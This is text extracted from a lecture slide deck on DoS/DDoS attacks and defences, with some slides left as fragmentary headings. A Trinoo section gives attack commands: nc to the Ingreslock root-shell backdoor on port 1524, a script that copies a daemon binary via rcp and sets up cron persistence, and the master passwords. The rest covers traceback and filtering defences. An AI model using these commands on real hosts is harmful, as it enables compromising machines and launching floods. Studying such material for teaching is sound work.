Network Security
By Jinjian Ma
CIA +Availability
Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS - - PowerPoint PPT Presentation
Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS Detection & Defense Prevention DOS/DDoS Types Vulnerability attack Flooding attack DoS vs DDoS DoS: Attack is launched from single host Less
By Jinjian Ma
CIA +Availability
DoS:
DDoS:
attacker I will exploit TCP port 1524 to do something evil Ingreslock backdoor uses port 1524, telnet to it will give you a root shell nmap scan port 1524
A.A.A.A B.B.B.B Compromised hosts found by scan ./trin.sh | nc A.A.A.A 1524 & ./trin.sh | nc B.B.B.B 1524 & ./trin.sh | nc C.C.C.C 1524 & ./trin.sh | nc D.D.D.D 1524 & C.C.C.C D.D.D.D Note: you can imagine nc does almost the same thing as telnet
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen" echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc.listen" echo "echo launching trinoo" echo "/usr/sbin/rpc.listen" echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron" echo "crontab cron" echo "echo launched" echo "exit"
master master master … daemon daemon … daemon daemon … daemon daemon victim attacker uses telnet to interact with master master send messages to daemons daemons listen to port connected to master Message flood
1.Prepare daemons on compromised hosts 2.Launch masters, enter password (gOrave) 3.Telnet to masters, enter password (betaalmostdone) 4.Now you can control a DDoS attack
Show active daemons Launch an attack
ICMP smurf flooding
TCP SYN flooding UDP flooding …
Hop-count IP traceback Intrusion Detection Systems (IDS)
Attackers want:
flooding traffic
reflectors Idea:
typically: 30, 32, 60, 64, 128, 255
Pros:
Cons:
zombies
Traceback true attacking source
Fast Internet Traceback (FIT)
6th bit in TTL
C
C: global constant
RIT implemented router ID: 0101100000000000 TTL: 255 -> 1111 1111 ID: 0101100000000000 TTL: 254 -> 1111 1110 ID: 0101100000000000 TTL: 253 -> 1111 1101 ID: 111(4th part of IP hash) TTL: 246 -> 1111 0110 ID: 111(4th part of IP hash) TTL: 245 -> 1111 0101 ID: 111(4th part of IP hash) TTL: 244 -> 1111 0100 ID: 111(4th part of IP hash) TTL: 243 -> 1111 0011 This packet came from a RIT router 3 hops away from me! 6th bit in TTL
6th bit in TTL FIT router Original TTL: 253 -> (1111 1101) C = 22 -----------> (1 0110) New TTL: 246 ---> (1111 0110) b: 1 Marking probability: 0.04 C = 22
C = 22 ---> (1 0110) b: 1 d = (b|c - TTL[5::0]) mod 64 d = (1|1 0110 - 110011) mod 64 = 3 mod 64 = 3 hops aways from FIT ruoter Server maintains a map of IP hashes Precomputed before attack
Pros:
Cons:
Redundant service Defense using puzzle Pushback
Challenge: No security policies can be globally enforced